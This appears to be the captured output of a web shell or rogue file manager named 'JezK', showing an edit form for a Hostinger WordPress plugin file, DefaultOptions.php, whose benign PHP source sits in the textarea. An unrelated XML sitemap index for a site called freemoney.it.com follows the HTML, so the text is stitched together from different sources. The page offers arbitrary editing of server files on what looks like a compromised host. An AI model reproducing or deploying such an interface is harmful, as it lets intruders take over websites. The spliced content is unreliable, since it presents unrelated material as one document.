
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: DefaultOptions.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace Hostinger;

use Hostinger\Admin\Options\PluginOptions;
use Hostinger\Helper;

defined( &#039;ABSPATH&#039; ) || exit;

class DefaultOptions {
    /**
     * @return void
     */
    public function add_options(): void {
        $this-&gt;configure_security_settings();

        foreach ( $this-&gt;options() as $key =&gt; $option ) {
            update_option( $key, $option );
        }
    }

    public function configure_security_settings(): void {
        $hostinger_plugin_settings = get_option( HOSTINGER_PLUGIN_SETTINGS_OPTION, array() );

        if ( empty( $hostinger_plugin_settings[&#039;bypass_code&#039;] ) ) {
            $hostinger_plugin_settings[&#039;bypass_code&#039;] = Helper::generate_bypass_code( 16 );
            $this-&gt;update_plugin_settings( $hostinger_plugin_settings );
        }

        $this-&gt;configure_authentication_password();
    }

    public function configure_authentication_password(): void {
        global $wpdb;
        $hostinger_plugin_settings = get_option( HOSTINGER_PLUGIN_SETTINGS_OPTION, array() );

        $existing_passwords = (int) $wpdb-&gt;get_var( $wpdb-&gt;prepare( &quot;SELECT COUNT(*) FROM {$wpdb-&gt;usermeta} WHERE meta_key = %s&quot;, &#039;_application_passwords&#039; ) );

        if ( $existing_passwords === 0 ) {
            $hostinger_plugin_settings[&#039;disable_authentication_password&#039;] = true;
            $this-&gt;update_plugin_settings( $hostinger_plugin_settings );
        }
    }

    private function update_plugin_settings( array $settings ): void {
        $plugin_options = new PluginOptions( $settings );
        update_option( HOSTINGER_PLUGIN_SETTINGS_OPTION, $plugin_options-&gt;to_array(), false );
    }

    /**
     * @return string[]
     */
    private function options(): array {
        $options = array(
            &#039;optin_monster_api_activation_redirect_disabled&#039; =&gt; &#039;true&#039;,
            &#039;wpforms_activation_redirect&#039;                    =&gt; &#039;true&#039;,
            &#039;aioseo_activation_redirect&#039;                     =&gt; &#039;false&#039;,
        );

        if ( Helper::is_plugin_active( &#039;astra-sites&#039; ) ) {
            $options = array_merge( $options, $this-&gt;get_astra_options() );
        }

        return $options;
    }

    /**
     * @return string[]
     */
    private function get_astra_options(): array {
        return array(
            &#039;astra_sites_settings&#039; =&gt; &#039;gutenberg&#039;,
        );
    }
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//freemoney.it.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://freemoney.it.com/post-sitemap.xml</loc>
		<lastmod>2026-09-06T18:08:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://freemoney.it.com/page-sitemap.xml</loc>
		<lastmod>2026-08-31T10:13:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://freemoney.it.com/category-sitemap.xml</loc>
		<lastmod>2026-09-06T18:08:19+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->